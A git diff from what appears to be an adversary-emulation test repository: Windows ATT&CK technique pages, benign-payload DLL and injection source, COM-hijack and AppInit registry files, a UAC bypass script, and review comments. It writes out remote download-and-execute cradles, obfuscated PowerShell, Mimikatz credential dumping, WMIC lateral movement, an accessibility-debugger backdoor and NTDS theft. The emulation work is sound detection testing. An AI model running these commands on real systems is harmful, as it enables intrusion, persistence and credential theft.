$reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr + +### Invoke-AppPathBypass + +Note: Windows 10 only + +Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + + Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass" + +At prompt, to test: + + C:\Windows\System32\cmd.exe + +### Obfuscated Powershell + +Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" + + cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo 
%ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" + +Second test: + + cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" + +## Powershell Obfuscation + +Provided by @danielbohannon + +[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md) + + +Setup: + + Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1') + +Input: + + Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell + +Follow prompts to create variables. + +Output: + + cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" diff --git a/Windows/Execution/RegsvcsRegasm.md b/Windows/Execution/RegsvcsRegasm.md new file mode 100644 index 00000000..a65c88c5 --- /dev/null +++ b/Windows/Execution/RegsvcsRegasm.md 
@@ -0,0 +1,22 @@ +## Regsvcs/Regasm + +MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121) + +### Execution Examples: + +[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) + +Input: + + x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll + + x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll + + + x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll + + x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll + + +## Test Script +[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs) diff --git a/Windows/Execution/Regsvr32.md b/Windows/Execution/Regsvr32.md new file mode 100644 index 00000000..1f790250 --- /dev/null +++ b/Windows/Execution/Regsvr32.md @@ -0,0 +1,16 @@ +## Regsvr32 + +MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117) + +### Local Scriptlet Execution: + + regsvr32.exe /s /u /i:file.sct scrobj.dll + +### Remote Scriptlet Exection: + + regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll + +## Test Script + +[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct) + diff --git a/Windows/Execution/Rundll32.md b/Windows/Execution/Rundll32.md new file mode 100644 index 00000000..0d8164bd --- /dev/null +++ b/Windows/Execution/Rundll32.md @@ -0,0 +1,13 @@ +## Rundll32 + +MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085) + +### Executes an export inside of a dll. + + rundll32 AllTheThings.dll,EntryPoint + +## Test Script + +[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings) + + diff --git a/Windows/Execution/Trusted_Developer_Utilities.md b/Windows/Execution/Trusted_Developer_Utilities.md new file mode 100644 index 00000000..47992d0d 
--- /dev/null +++ b/Windows/Execution/Trusted_Developer_Utilities.md @@ -0,0 +1,12 @@ +## Trusted Developer Utilities + +MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127) + +### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx) + + C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj + +## Test Script + +[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj) + diff --git a/Windows/Execution/Windows_Management_Instrumentation.md b/Windows/Execution/Windows_Management_Instrumentation.md new file mode 100644 index 00000000..31eaae36 --- /dev/null +++ b/Windows/Execution/Windows_Management_Instrumentation.md @@ -0,0 +1,45 @@ +## Windows Management Instrumentation + +MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047) + +### Reconnaissance + +Input: + + wmic useraccount get /ALL + +Input: + + wmic process get caption,executablepath,commandline + +Input: + + wmic qfe get description,installedOn /format:csv + +Input: + + wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +Input: + + get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" + +### Lateral Movement + +Input: + + wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +Input: + + wmic /NODE: "192.168.0.1" process call create "evil.exe" + +### Privileged Escalation + +Input: + + wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" + +Input: + + wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" 
diff --git a/Windows/Lateral Movement/Windows Admin Shares.md b/Windows/Lateral Movement/Windows Admin Shares.md new file mode 100644 index 00000000..2354bc61 --- /dev/null +++ b/Windows/Lateral Movement/Windows Admin Shares.md @@ -0,0 +1,15 @@ +## Windows Admin Shares + +MITRE ATT&CK Technique: [T1077](https://attack.mitre.org/wiki/Technique/T1077) + +Input: + + cmd.exe /c "net use \\\ipc$ P@ssw0rd1 /u:\Administrator" + +Input: + + cmd.exe /c "net use \\\admin$ P@ssw0rd1 /u:\Administrator" + +Input: + + cmd.exe /c "net use \\\c$ P@ssw0rd1 /u:\Administrator" diff --git a/Windows/Lateral Movement/Windows Remote Management.md b/Windows/Lateral Movement/Windows Remote Management.md new file mode 100644 index 00000000..f8f4fe91 --- /dev/null +++ b/Windows/Lateral Movement/Windows Remote Management.md @@ -0,0 +1,33 @@ +## Windows Remote Management + +MITRE ATT&CK Technique: [T1028](https://attack.mitre.org/wiki/Technique/T1028) + +### Enable Windows Remote Management + +Input: + + powershell Enable-PSRemoting -Force + +### Powershell lateral movement using the mmc20 application com object + +Input: + + powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + +Reference: + +https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + + +### WMIC Process Call Create + + wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +### PowerSploit Invoke-Mimikatz WinRM + + powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1 + powershell Invoke-Mimikatz -ComputerName TARGET + +Reference: + + https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/ 
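Review bot: the "Mimikatz - Cradlecraft PsSendKeys" one-liner in Windows/Execution/PowerShell.md is cut off at `invoke-mimikatz -dumpcr`; the parameter is `-DumpCreds`, as in the first example. The second `### Download Mimikatz and Dump credentials` heading is a copy of the first, but the commands under it fetch `http://bit.ly/L3g1tCrad1e` rather than Invoke-Mimikatz, so retitle it (e.g. "Download Cradle"). Because these tests depend on a third-party shortlink resolving to particular content, document what the link is expected to return or point at a file in this repository so the test stays reproducible and reviewable.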
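Review bot: Windows/Execution/RegsvcsRegasm.md should state that regsvcs.exe only accepts strong-named assemblies, which is why the linked RegSvcsRegAsmBypass.cs is built with `/keyfile:key.snk`; a reader copying the `regsvcs.exe AllTheThings.dll` lines will otherwise not know why an unsigned build is rejected. The examples also name `AllTheThings.dll` while the binaries shipped in Windows/Payloads/AllTheThings are `AllTheThingsx86.dll` and `AllTheThingsx64.dll`, so one of the two should be renamed.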
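Review bot: typo in the heading `### Remote Scriptlet Exection:` in Windows/Execution/Regsvr32.md, should be `Execution`. It would also help the reader to spell out what `/s`, `/u` and `/i:` do in the two `regsvr32.exe /s /u /i:... scrobj.dll` lines, since the page gives no explanation of the switches.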
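Review bot: the last "Privileged Escalation" example in Windows/Execution/Windows_Management_Instrumentation.md does not do what it implies: `vssadmin create shadow /for=` takes a volume, not a file path, and redirecting vssadmin's stdout to `c:\not_the_NTDS.dit` captures the command's text output, not the database, so either fix or drop it. Also: the heading should read "Privilege Escalation" (and both commands under it are closer to scheduled-task persistence and credential access than to privilege escalation); the `get-wmiobject –class ... –namespace ... –computer` line uses en dashes where ASCII hyphens are expected, which will bite anyone retyping it; and `wmic /user: /password: /node:` has empty values that should be explicit placeholders such as `<user>`.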
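Review bot: the three `net use` lines in Windows/Lateral Movement/Windows Admin Shares.md are missing their host: `\\\ipc$` has no server name between the backslashes and `/u:\Administrator` has no domain or host, so as written the commands fail. Use explicit placeholders such as `\\<host>\ipc$` and `/u:<host>\Administrator`, and mark the hard-coded `P@ssw0rd1` as a sample value.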
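Review bot: `.Documnet` in the MMC20.Application one-liner in Windows/Lateral Movement/Windows Remote Management.md is a typo for `.Document`, so the command throws instead of running. Two labelling points: the MMC20.Application technique is DCOM, not WinRM, so it sits oddly under T1028; and `powershell-import` / `powershell Invoke-Mimikatz -ComputerName TARGET` in the PowerSploit section are Cobalt Strike Beacon commands, not PowerShell, which the heading should say. The WMIC `process call create` block duplicates the one in Windows_Management_Instrumentation.md and could simply link there.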
diff --git a/Windows/Payloads/AllTheThings/AllTheThingsx64.dll b/Windows/Payloads/AllTheThings/AllTheThingsx64.dll new file mode 100755 index 0000000000000000000000000000000000000000..770a7e0c8301da41477f4ca747a3f30a66aa5cd3 GIT binary patch literal 7168
Calls DllUnregisterServer + regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer +5.
+ rundll32 AllTheThings.dll,EntryPoint + +*/ + +[assembly: ApplicationActivation(ActivationOption.Server)] +[assembly: ApplicationAccessControl(false)] + +public class Program +{ + public static void Main() + { + Console.WriteLine("Hello From Main...I Don't Do Anything"); + //Add any behaviour here to throw off sandbox execution/analysts :) + } + +} + +public class Thing0 +{ + public static void Exec() + { + ProcessStartInfo startInfo = new ProcessStartInfo(); + startInfo.FileName = "calc.exe"; + Process.Start(startInfo); + } +} + +[System.ComponentModel.RunInstaller(true)] +public class Thing1 : System.Configuration.Install.Installer +{ + //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. + public override void Uninstall(System.Collections.IDictionary savedState) + { + + Console.WriteLine("Hello There From Uninstall"); + Thing0.Exec(); + + } + +} + +[ComVisible(true)] +[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")] +[ClassInterface(ClassInterfaceType.None)] +[ProgId("dllguest.Bypass")] +[Transaction(TransactionOption.Required)] +public class Bypass : ServicedComponent +{ + public Bypass() { Console.WriteLine("I am a basic COM Object"); } + + [ComRegisterFunction] //This executes if registration is successful + public static void RegisterClass(string key) + { + Console.WriteLine("I shouldn't really execute"); + Thing0.Exec(); + } + + [ComUnregisterFunction] //This executes if registration fails + public static void UnRegisterClass(string key) + { + Console.WriteLine("I shouldn't really execute either."); + Thing0.Exec(); + } + + public void Exec() { Thing0.Exec(); } +} + +class Exports +{ + + // + // + //rundll32 entry point + [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)] + public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow) + { + Thing0.Exec(); + } + [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)] + public static void 
DllRegisterServer() + { + Thing0.Exec(); + } + [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)] + public static void DllUnregisterServer() + { + Thing0.Exec(); + } + + + +} diff --git a/Windows/Payloads/AllTheThings/test.bat b/Windows/Payloads/AllTheThings/test.bat new file mode 100755 index 00000000..e6fb5efa --- /dev/null +++ b/Windows/Payloads/AllTheThings/test.bat @@ -0,0 +1,18 @@ + +REM X86 +Executing X86 AllTheThings Test +C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll +regsvr32.exe /s /u AllTheThingsx86.dll +regsvr32.exe /s AllTheThingsx86.dll +rundll32 AllTheThingsx86.dll,EntryPoint + +REM AMD64 + +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll +regsvr32.exe /s /u AllTheThingsx64.dll +regsvr32.exe /s AllTheThingsx64.dll +rundll32 AllTheThingsx64.dll,EntryPoint diff --git a/Windows/Payloads/AppInitInject.reg b/Windows/Payloads/AppInitInject.reg new file mode 100644 index 00000000..f9303562 --- /dev/null +++ b/Windows/Payloads/AppInitInject.reg @@ -0,0 +1,6 @@ +Windows Registry Editor Version 5.00 + +[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] +"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll" +"LoadAppInit_DLLs"=dword:00000001 +"RequireSignedAppInit_DLLs"=dword:00000000 diff --git a/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct b/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct new file mode 100755 index 00000000..830f48b1 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct 
@@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file diff --git a/Windows/Payloads/COMHijackScripts/COMHijack.reg b/Windows/Payloads/COMHijackScripts/COMHijack.reg new file mode 100755 index 00000000..7ea5eb31 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/COMHijack.reg @@ -0,0 +1,23 @@ +Windows Registry Editor Version 5.00 +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] +@="{00000001-0000-0000-0000-0000FEEDACDC}" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] +@="{00000001-0000-0000-0000-0000FEEDACDC}" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] +@="C:\\WINDOWS\\system32\\scrobj.dll" +"ThreadingModel"="Apartment" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] +@="AtomicRedTeam.1.00" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] +@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] +@="AtomicRedTeam" +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}] +[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs] +@="{00000001-0000-0000-0000-0000FEEDACDC}" diff --git a/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg b/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg new file mode 100755 index 00000000..1313fad6 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg 
@@ -0,0 +1,5 @@ +Windows Registry Editor Version 5.00 +[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] +[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}] diff --git a/Windows/Payloads/COMHijackScripts/test.bat b/Windows/Payloads/COMHijackScripts/test.bat new file mode 100755 index 00000000..06638ea6 --- /dev/null +++ b/Windows/Payloads/COMHijackScripts/test.bat @@ -0,0 +1,3 @@ +reg import COMHijack.reg +certutil.exe -CAInfo +reg import COMHijackCleanup.reg diff --git a/Windows/Payloads/DllInject/DLLInjection.cs b/Windows/Payloads/DllInject/DLLInjection.cs new file mode 100755 index 00000000..b67faf3c --- /dev/null +++ b/Windows/Payloads/DllInject/DLLInjection.cs 
@@ -0,0 +1,84 @@ +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +using System.Text; + + +// Source : http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread +// C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe DLLInjection.cs +// You will want to change target process, or dll name, depending on architecture. +// Sample DLL MessageBox Source From Here: https://github.com/enigma0x3/MessageBox . Thanks Matt ;-) + + +public class BasicInject +{ + [DllImport("kernel32.dll")] + public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto)] + public static extern IntPtr GetModuleHandle(string lpModuleName); + + [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] + static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] + static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, + uint dwSize, uint flAllocationType, uint flProtect); + + [DllImport("kernel32.dll", SetLastError = true)] + static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); + + [DllImport("kernel32.dll")] + static extern IntPtr CreateRemoteThread(IntPtr hProcess, + IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + + // privileges + const int PROCESS_CREATE_THREAD = 0x0002; + const int PROCESS_QUERY_INFORMATION = 0x0400; + const int PROCESS_VM_OPERATION = 0x0008; + const int PROCESS_VM_WRITE = 0x0020; + const int PROCESS_VM_READ = 0x0010; + + // used for memory allocation + const uint MEM_COMMIT = 0x00001000; + const uint MEM_RESERVE = 0x00002000; + const uint PAGE_READWRITE = 4; + + public static int Main() + { + // the target process 
- I'm using a dummy process for this + // if you don't have one, open Task Manager and choose wisely + Process.Start("notepad"); + + Process targetProcess = Process.GetProcessesByName("notepad")[0]; + + // geting the handle of the process - with required privileges + IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); + + // searching for the address of LoadLibraryA and storing it in a pointer + IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); + + // name of the dll we want to inject + string dllName = ""; + if(IntPtr.Size == 8) + { + dllName = "MessageBox64.dll"; + } + else + { + dllName = "MessageBox32.dll"; + } + // alocating some memory on the target process - enough to store the name of the dll + // and storing its address in a pointer + IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + // writing the name of the dll there + UIntPtr bytesWritten; + WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); + + // creating a thread that will call LoadLibraryA with allocMemAddress as argument + CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); + + return 0; + } +} 
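Review bot: in Windows/Payloads/AllTheThings/Program.cs the comment `//This executes if registration fails` on `UnRegisterClass` is inaccurate: a `[ComUnregisterFunction]` method runs when the assembly is unregistered (`regasm /U`), not when registration fails, and the `[ComRegisterFunction]` comment should likewise say it runs during registration. The header should also note that `[DllExport]` comes from a third-party unmanaged-exports package (e.g. UnmanagedExports), not from the .NET Framework, and that `Thing1` overrides only `Uninstall`, which is why the InstallUtil call in test.bat needs the `/U` switch.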
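Review bot: line 3 of Windows/Payloads/AllTheThings/test.bat, `Executing X86 AllTheThings Test`, is a bare sentence, so cmd.exe tries to run a program named `Executing` and prints an error before the first test; prefix it with `echo` or `REM` as the `REM X86` and `REM AMD64` lines do, and give the AMD64 block the same banner for symmetry.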
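Review bot: Windows/Payloads/AppInitInject.reg sets `RequireSignedAppInit_DLLs` to 0 and hard-codes `C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll`, which only exist if the DLLs from Windows/Payloads/DllInject are copied there; document both in the accompanying markdown, together with the caveat that AppInit_DLLs is ignored on Windows 8 and later when Secure Boot is enabled, so the test is a no-op on such hosts. A matching cleanup .reg (as COMHijackScripts has) would also be appropriate since this key is machine-wide.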
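Review bot: the `ScriptletURL` in Windows/Payloads/COMHijackScripts/COMHijack.reg points at a gist under a personal account rather than at the `AtomicRedTeam.sct` added in the same directory, so the test silently depends on external content that can change; point it at the repository copy or a local path. test.bat should also say which component CLSID `{372FCE38-4324-11D0-8810-00A0C903B83C}` belongs to and why `certutil.exe -CAInfo` is the trigger, since that TreatAs entry is the whole test.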
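Review bot: none of the Win32 return values in Windows/Payloads/DllInject/DLLInjection.cs are checked: `OpenProcess`, `VirtualAllocEx` and `CreateRemoteThread` can return `IntPtr.Zero` and `WriteProcessMemory` false, yet `Main` still returns 0, so a failed injection looks like a pass; check each and report `Marshal.GetLastWin32Error()`. Two further problems: `Process.GetProcessesByName("notepad")[0]` immediately after `Process.Start("notepad")` is a race (the new process may not be enumerated yet, and `[0]` may pick a pre-existing notepad), so use the `Process` object that `Process.Start` returns; and `dllName` is a bare file name that `LoadLibraryA` resolves in the target's search path, not the injector's directory, so pass `Path.GetFullPath(dllName)`.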
diff --git a/Windows/Payloads/DllInject/MessageBox32.dll b/Windows/Payloads/DllInject/MessageBox32.dll new file mode 100755 index 0000000000000000000000000000000000000000..03031ed8db19d703fb91d49c43aec7802f5673ef GIT binary patch literal 8704
diff --git a/Windows/Payloads/DllInject/MessageBox64.dll b/Windows/Payloads/DllInject/MessageBox64.dll new file mode 100755 index 0000000000000000000000000000000000000000..5d2693a673ed44b5fc5bdf1af7c74cbb833d5a77 GIT binary patch literal 10752
+ + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Windows/Payloads/RegSvcsRegAsmBypass.cs b/Windows/Payloads/RegSvcsRegAsmBypass.cs new file mode 100644 index 00000000..8d033f6d --- /dev/null +++ b/Windows/Payloads/RegSvcsRegAsmBypass.cs
@@ -0,0 +1,50 @@ +using System; +using System.EnterpriseServices; +using System.Runtime.InteropServices; + +/* +Author: Casey Smith, Twitter: @subTee +License: BSD 3-Clause +Create Your Strong Name Key -> key.snk + +From PowerShell.exe + +Step One: Creates a Strong Name Key. +$key = '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' +$Content = [System.Convert]::FromBase64String($key) +Set-Content key.snk -Value $Content -Encoding Byte + +C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk RegSvcsRegaAsmBypass.cs +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll + +[OR] + +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll +//Executes UnRegisterClass If you don't have permissions +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll + +//This calls the UnregisterClass Method +*/ +namespace regsvcser +{ + + public class Bypass : ServicedComponent + { + public Bypass() { Console.WriteLine("I am a basic COM Object"); } + + [ComRegisterFunction] //This executes if registration is successful + public static void RegisterClass ( string key ) + { + Console.WriteLine("I shouldn't really execute"); + } + + [ComUnregisterFunction] //This executes if registration fails + public static void UnRegisterClass ( string key ) + { + Console.WriteLine("I shouldn't really execute either."); + + } + } + +} diff --git a/Windows/Payloads/RegSvr32.sct b/Windows/Payloads/RegSvr32.sct new file mode 100644 index 00000000..697938ed --- /dev/null +++ b/Windows/Payloads/RegSvr32.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + diff --git a/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 b/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 new file mode 100644 index 00000000..4c119b03 --- /dev/null +++ b/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 
@@ -0,0 +1,92 @@ +function Invoke-EventVwrBypass { +<# +.SYNOPSIS + +Bypasses UAC by performing an image hijack on the .msc file extension +Expected to work on Win7, 8.1 and Win10 + +Only tested on Windows 7 and Windows 10 + +Author: Matt Nelson (@enigma0x3) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +.PARAMETER Command + + Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " + +.EXAMPLE + +Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" + +This will write out "Is Elevated: True" to 